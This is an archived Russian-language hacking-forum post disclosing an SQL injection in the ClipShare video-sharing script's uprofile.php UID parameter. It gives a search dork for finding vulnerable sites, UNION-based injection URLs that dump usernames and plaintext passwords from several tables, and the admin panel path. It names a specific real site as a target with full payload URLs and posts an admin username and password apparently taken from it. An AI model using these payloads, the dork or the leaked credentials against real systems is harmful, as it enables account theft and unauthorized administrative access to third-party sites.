PDA

Просмотр полной версии : ClipShare Vulns


Constantine
23.01.2008, 19:18
Впринципе есть в паблике итак, но в каком то дородовом виде, ничего не расписано.

Продукт: Clipshare(utube clone)
Уязвимость: Sql injection существует из-за недостаточно обработки входных данных в параметр uid, сценария uprofile.php

http://site/uprofile.php?UID=[sql]

Дорк: Powered by Clipshare

Подробности
а)Таблицы без префиксов
http://site/uprofile.php?UID=1520+union+select+1,2,convert(con cat(uid,0x3a,username,0x3a,pwd)+using+latin1),4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1+from+signup+limit+0,1/*

Пароли в чистом виде
б)Таблицы с префиксами ( соответсвенно данные можно получить только при наличие установленного mysql 5.x.x)

http://site/uprofile.php?UID=1520+union+select+1,2,convert(con cat(username,0x3a,password)+using+latin1),4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+fr om+[префкс].mw_users/*

http://site/uprofile.php?UID=1520+union+select+1,2,convert(con cat(username,0x3a,password)+using+latin1),4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+fr om+[префкс].mw_members/*

Панель администратора
http://site/siteadmin

Пример уязвимого сайта


http://www.manggatv.com/uprofile.php?UID=1520+union+select+1,2,convert(con cat(username,0x3a,password)+using+latin1),4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+fr om+mangga_web.mw_users/*

supervisor:1ad2min

http://www.manggatv.com/uprofile.php?UID=1520+union+select+1,2,convert(con cat(uid,0x3a,username,0x3a,pwd)+using+latin1),4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1+from+signup+limit+0,1/*

p\s это в качестве бонуса=\